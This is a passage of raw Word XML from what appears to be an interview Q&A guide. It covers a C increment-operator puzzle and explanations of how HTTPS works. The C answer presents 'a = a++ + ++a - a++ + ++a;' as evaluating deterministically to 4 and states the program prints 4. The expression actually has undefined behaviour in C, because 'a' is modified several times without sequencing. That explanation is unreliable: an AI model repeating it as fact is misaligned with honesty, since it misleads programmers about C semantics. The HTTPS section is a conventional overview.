      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6FBB9" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>printf</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d\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>”,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523BCA6" w14:textId="77777777" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450FC2C" w14:textId="223D4844" w:rsidR="007A69EB" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D2542" w14:textId="13C316D7" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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n the given C program, the expression used for the variable a can be a bit tricky due to the usage of the post-increment (a++) and pre-increment (++a) operators. Let's break it down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B4C56" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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The code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC66A5"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nclude&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A94E4"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nt main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379EDD93"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A715DC"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int a = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE815E"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1 + 1 - 1 + 1;  // This expression does nothing because the result is not assigned to any variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5FB4B"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a = a++ + ++a - a++ + ++a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7647BC"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printf("%d\n", a);  // This will print the value of 'a' after the expression is evaluated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAC8D2"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6EBBE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EEAE7D" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Understanding the expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8E2C8"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expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10BF50"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 = a++ + ++a - a++ + ++a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438843CB"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nvolves post-increment (a++) and pre-increment (++a), which can sometimes cause confusion. Here's how these operators work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D9384"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ost-increment (a++)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This returns the value of a, then increments a by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013127D1"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re-increment (++a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This increments a first, then returns the incremented value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D12FE0"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Now, let's break it down step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552691FF"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Initial value</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: a = 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBBEF9"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First a++</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A4069" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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value of a is returned as 0, and then a is incremented to 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5A979" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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o, a++ results in 0, and a becomes 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A638309"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Next ++a</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6E8AE" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Now, a = 1. With ++a, a is incremented to 2 first, and then the value 2 is used in the expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C393127"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econd a++</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F8C1F" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Now, a = 2. The value of a is returned as 2, and then a is incremented to 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4F4AC4" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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o, a++ results in 2, and a becomes 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4224F"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Next ++a</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D51A1F" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Now, a = 3. With ++a, a is incremented to 4 first, and then the value 4 is used in the expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685806FA" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Putting it all together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14109E6F"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 = 0 + 2 - 2 + 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AB43B"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Now, calculating this step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36012635"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 = 0 + 2 = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652392DF"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 = 2 - 2 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C66A20"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 = 0 + 4 = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E223CA"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lastRenderedPageBreak/>
        <w:t>So, the final value of a is 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83F83D" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD71FBD"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program will print:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E97EDC" w14:textId="77777777" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D4534" w14:textId="2857A44E" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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092D425D">
          <v:rect id="_x0000_i3585" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F20E23" w14:textId="35A0D3AD" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="886" w:name="_Toc196308366"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is https protocol</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="886"/>
    </w:p>
    <w:p w14:paraId="2CC9B1E1" w14:textId="71B1C224" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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HTTPS (Hypertext Transfer Protocol Secure)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an extension of </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Hypertext Transfer Protocol) that is used for secure communication over a computer network, particularly the Internet. It is widely used to protect sensitive data during communication between a user's browser and a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9BE48" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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Key Features of HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5BD2E" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL (Secure Sockets Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TLS (Transport Layer Security)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocols to encrypt the data being transferred. This means that any data exchanged (such as passwords, credit card numbers, etc.) is encrypted and unreadable by attackers, even if intercepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF74C34" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTPS ensures that the data sent and received has not been altered in transit. This prevents man-in-the-middle attacks, where malicious actors could manipulate data while it's being transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76332D19" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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uthentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By using digital certificates, HTTPS helps verify the identity of the website you are communicating with. It ensures that the server you're connected to is indeed the one you think it is, preventing spoofing or phishing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245604F4" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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How HTTPS Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1308DBA3" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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SL/TLS Handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a user connects to a website via HTTPS, a process called the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DEAB45" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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client (browser) and server agree on a secure connection method and exchange encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D529A" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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The server sends its </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prove its identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936C44C" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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client verifies the server's certificate against trusted Certificate Authorities (CAs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55157618" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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f valid, a secure encrypted connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360526F" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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Encrypted Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the handshake is complete, all data between the client and server is encrypted using symmetric encryption (where both parties share the same encryption key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11472C64" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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HTTPS URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Websites that use HTTPS start their URLs with </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"https://"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of "http://". In modern browsers, a padlock symbol next to the URL further indicates a secure connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727EB76A" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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Why is HTTPS Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F5B77" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It protects against eavesdropping and data manipulation, ensuring that the information exchanged is private and authentic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974A4BF" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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Trust</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Users are more likely to trust websites that use HTTPS, as they know their data is secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0F5ED" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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EO</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Major search engines like Google give preference to HTTPS-enabled websites, which can improve search engine ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33475AF7" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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Legal Compliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For websites handling sensitive data, HTTPS may be required to comply with regulations like GDPR, HIPAA, and PCI-DSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537995B6" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368AD"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A715B1A" w14:textId="77777777" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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n essence, HTTPS ensures that data transmitted between users and websites is kept secure, private, and trustworthy. It is crucial for maintaining the confidentiality and integrity of online communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC80F7" w14:textId="2FE7A989" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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55D38D7C">
          <v:rect id="_x0000_i3586" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66264991" w14:textId="503CB0DE" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="887" w:name="_Toc196308367"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does https internally work</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="887"/>
    </w:p>
    <w:p w14:paraId="13B1D157" w14:textId="73DF7BC3" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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HTTPS (Hypertext Transfer Protocol Secure) works by combining two essential components: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
